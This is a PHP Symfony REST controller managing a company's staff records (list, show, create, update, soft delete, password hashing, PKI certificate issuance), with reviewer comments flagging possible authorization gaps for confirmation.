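<?php

namespace AppBundle\Controller\Api;

use FOS\RestBundle\Controller\FOSRestController;
use FOS\RestBundle\Controller\Annotations as Rest;
use Sensio\Bundle\FrameworkExtraBundle\Configuration\ParamConverter;
use Symfony\Component\HttpFoundation\Request;
use Symfony\Component\HttpFoundation\Response;
use Symfony\Component\HttpFoundation\JsonResponse;
use Nelmio\ApiDocBundle\Annotation as Doc;
use Sensio\Bundle\FrameworkExtraBundle\Configuration\Security;
use AppBundle\Entity\Company;
use AppBundle\Entity\Address;
use AppBundle\Entity\Staff;
use AppBundle\Form\StaffType;
use AppBundle\Form\AddressType;

/**
 * REST endpoints for the staff members of a company
 * (list / show / create / update / soft-delete under /companies/{companyId}/staffs).
 *
 * Access control is expressed with @Security annotations per action; the
 * "belongs to this company" check is done by hand where the action receives
 * both the Company and the Staff.
 */
class CompanyStaffController extends FOSRestController
{
    /**
     * Roles for which a PKI user certificate is issued right after creation.
     */
    private const PKI_CERT_ROLES = ['ROLE_OPERATOR', 'ROLE_CONTROLLER', 'ROLE_AGENCY_ADMIN'];

    /**
     * Get the list of all staffs of a company
     *
     * @param integer $companyId The id of the company
     *
     * @Rest\Get("/companies/{companyId}/staffs")
     * @Rest\View(
     *     statusCode = Response::HTTP_OK,
     *     SerializerGroups = {"STAFF_DETAILS"}
     * )
     * @Doc\ApiDoc(
     *     section="Staffs of a company",
     *     resource=true,
     *     description="Get the list of all staffs of a company.",
     * )
     * @Security("has_role('ROLE_AGENCY_ADMIN') or has_role('ROLE_COMPANY_ADMIN')")
     */
    public function listAction(Company $company)
    {
        // NOTE(review): the role check alone does not tie a ROLE_COMPANY_ADMIN caller
        // to the {companyId} in the URL; whether that is enforced elsewhere (voter,
        // repository scoping) is not visible from this file -- confirm.
        return $this
            ->getDoctrine()
            ->getRepository('AppBundle:Staff')
            ->findByCompany($company);
    }

    /**
     * Get one staff of a company
     *
     * @param integer $companyId The id of the company
     * @param integer $id        The id of the staff
     *
     * @Rest\Get("/companies/{companyId}/staffs/{id}")
     * @ParamConverter("company", options={"mapping": {"companyId": "companyId"}})
     * @Rest\View(
     *     statusCode = Response::HTTP_OK,
     *     SerializerGroups = {"LIST", "STAFF_DETAILS"}
     * )
     * @Doc\ApiDoc(
     *     section="Staffs of a company",
     *     resource=true,
     *     description="Get one staff of a company.",
     * )
     * @Security("has_role('ROLE_AGENCY_ADMIN') or has_role('ROLE_COMPANY_ADMIN')")
     */
    public function showAction(Company $company, Staff $staff)
    {
        $mismatch = $this->staffCompanyMismatch($company, $staff);
        if ($mismatch !== null) {
            return $mismatch;
        }

        return $staff;
    }

    /**
     * Create one staff for a company
     *
     * The request body is bound to StaffType; an optional "address" key is bound
     * to AddressType; an optional "roles" key overrides the roles. The plain
     * password from the body is hashed before persisting. For roles listed in
     * PKI_CERT_ROLES a user certificate is requested from the PKI service after
     * the flush.
     *
     * @param integer $companyId The id of the company
     *
     * @Rest\Post("/companies/{companyId}/staffs")
     * @Rest\View(
     *     statusCode = Response::HTTP_CREATED,
     *     SerializerGroups = {"LIST", "STAFF_DETAILS"}
     * )
     * @Doc\ApiDoc(
     *     section="Staffs of a company",
     *     resource=true,
     *     description="Create one staff of a company.",
     *     input = {
     *         "class"="AppBundle\Form\StaffType",
     *     },
     *     output = {
     *         "class"="",
     *     }
     * )
     * @Security("has_role('ROLE_COMPANY_ADMIN')")
     */
    public function createAction(Request $request, Company $company)
    {
        $staff = new Staff();
        $staffForm = $this->createForm(StaffType::class, $staff);
        // clearMissing=false: fields absent from the body keep their current value.
        $staffForm->submit($request->request->all(), false);

        $staffErrors = $this->get('validator')->validate($staff);
        if (count($staffErrors)) {
            return $this->view($staffErrors, Response::HTTP_BAD_REQUEST);
        }

        // An "address" key in the body populates the address; otherwise the
        // staff gets a fresh, empty Address.
        $address = new Address();
        if ($request->request->has("address")) {
            $addressForm = $this->createForm(AddressType::class, $address);
            $addressForm->submit($request->get("address"), false);

            $addressErrors = $this->get('validator')->validate($address);
            if (count($addressErrors)) {
                return $this->view($addressErrors, Response::HTTP_BAD_REQUEST);
            }
        }
        $staff->setAddress($address);

        // NOTE(review): the caller only needs ROLE_COMPANY_ADMIN, yet any role string
        // from the body is accepted here (including ROLE_AGENCY_ADMIN). Whether a
        // company admin may hand out that role depends on the role hierarchy, which
        // is not visible from this file -- confirm.
        if ($request->request->has("roles")) {
            $staff->setRoles($request->request->get("roles"));
        }

        $this->encodePlainPassword($staff);

        // No validation errors at this point: attach to the company and persist.
        $staff->setCompany($company);
        $em = $this->getDoctrine()->getManager();
        $em->persist($staff);
        $em->flush();

        // Issue a PKI user certificate for the operational roles. The original
        // code read `$cust->getPlainPassword()` with `$cust` never defined; the
        // staff's own plain password is the intended value.
        $firstRole = $staff->getRoles()[0] ?? null;
        if (in_array($firstRole, self::PKI_CERT_ROLES, true)) {
            $pkiServer = $this->container->get('itravel.pki_node_server');
            // Return value was never checked by the caller; kept as fire-and-forget.
            $pkiServer->createUserCert($staff, $staff->getPlainPassword());
        }

        return $staff;
    }

    /**
     * Update one staff of a company
     *
     * Administrators (agency or company) may update any staff; any other
     * ROLE_STAFF caller may only update their own record. Only administrators
     * may change roles. A non-empty plain password in the body replaces the
     * stored hash.
     *
     * @param integer $companyId The id of the company
     * @param integer $id        The id of the staff
     *
     * @Rest\Put("/companies/{companyId}/staffs/{id}")
     * @Rest\View(
     *     statusCode = Response::HTTP_ACCEPTED,
     *     SerializerGroups = {"LIST", "STAFF_DETAILS"}
     * )
     * @Doc\ApiDoc(
     *     section="Staffs of a company",
     *     resource=true,
     *     description="Update one staff of a company.",
     *     input = {
     *         "class"="AppBundle\Form\StaffType",
     *     },
     *     output = {
     *         "class"="",
     *     }
     * )
     * @Security("has_role('ROLE_STAFF')")
     */
    public function updateAction(Request $request, Staff $staff)
    {
        $checker = $this->get('security.authorization_checker');
        $isAdmin = $checker->isGranted('ROLE_AGENCY_ADMIN') || $checker->isGranted('ROLE_COMPANY_ADMIN');

        // Non-admin callers may only touch their own record.
        if (!$isAdmin) {
            $connectedUser = $this->get('security.token_storage')->getToken()->getUser();
            if (!$staff->isEqualTo($connectedUser)) {
                return new JsonResponse(['error' => "Cannot update another user's data"], Response::HTTP_METHOD_NOT_ALLOWED);
            }
        }

        // Roles come from the request body, so without this gate a self-updating
        // ROLE_STAFF user could assign themselves any role. Reject explicitly
        // rather than silently dropping the key.
        // NOTE(review): assumes StaffType itself does not map "roles"; if it does,
        // the form submit below would still apply them -- confirm.
        $rolesSubmitted = $request->request->has("roles");
        if ($rolesSubmitted && !$isAdmin) {
            return new JsonResponse(['error' => 'Only an administrator can change roles'], Response::HTTP_FORBIDDEN);
        }

        // NOTE(review): this action does not receive the Company from {companyId},
        // so the staff/company match done in show/delete is not checked here -- confirm
        // whether that is intended.

        // clearMissing=false: fields absent from the body keep their current value
        // instead of being set to null.
        $form = $this->createForm(StaffType::class, $staff);
        $form->submit($request->request->all(), false);

        $listErrors = $this->get('validator')->validate($staff);
        if (count($listErrors)) {
            return $this->view($listErrors, Response::HTTP_BAD_REQUEST);
        }

        if ($rolesSubmitted) {
            $staff->setRoles($request->request->get("roles"));
        }

        // A non-empty plain password means the caller wants to change it.
        if (!empty($staff->getPlainPassword())) {
            $this->encodePlainPassword($staff);
        }

        // No more errors at this point; $staff is managed, flush writes the changes.
        $this->getDoctrine()->getManager()->flush();

        return $staff;
    }

    /**
     * Delete one staff of a company
     *
     * This is a soft delete: the staff is marked inactive, not removed.
     *
     * @param integer $companyId The id of the company
     * @param integer $id        The id of the staff
     *
     * @Rest\Delete("/companies/{companyId}/staffs/{id}")
     * @Rest\View(
     *     statusCode = Response::HTTP_NO_CONTENT
     * )
     * @Doc\ApiDoc(
     *     section="Staffs of a company",
     *     resource=true,
     *     description="Delete one staff of a company.",
     * )
     * @Security("has_role('ROLE_AGENCY_ADMIN') or has_role('ROLE_COMPANY_ADMIN')")
     */
    public function deleteAction(Company $company, Staff $staff)
    {
        $mismatch = $this->staffCompanyMismatch($company, $staff);
        if ($mismatch !== null) {
            return $mismatch;
        }

        $staff->setIsActive(false);

        // No more errors at this point; $staff is managed, flush writes the change.
        $this->getDoctrine()->getManager()->flush();

        return new JsonResponse('');
    }

    /**
     * Returns an error response when $staff does not belong to $company, null otherwise.
     *
     * Shared by show and delete so both answer the mismatch the same way. The
     * status code and loose object comparison are kept from the original
     * behaviour; clients may depend on the former.
     *
     * @return JsonResponse|null
     */
    private function staffCompanyMismatch(Company $company, Staff $staff)
    {
        // NOTE(review): `!=` on entities compares them property by property; if the
        // entities are bidirectionally linked this can recurse deeply. Comparing the
        // identifiers instead would be safer, but the Company id getter is not
        // visible from this file -- confirm before changing.
        if ($staff->getCompany() != $company) {
            return new JsonResponse(['error' => 'This staff does not belong to this company '], Response::HTTP_METHOD_NOT_ALLOWED);
        }

        return null;
    }

    /**
     * Hashes the staff's plain password with the configured encoder and stores
     * the result in the password field. Used by create and update so both
     * follow the same hashing path.
     */
    private function encodePlainPassword(Staff $staff)
    {
        $encoder = $this->get('security.password_encoder');
        $encoded = $encoder->encodePassword($staff, $staff->getPlainPassword());
        $staff->setPassword($encoded);
    }
}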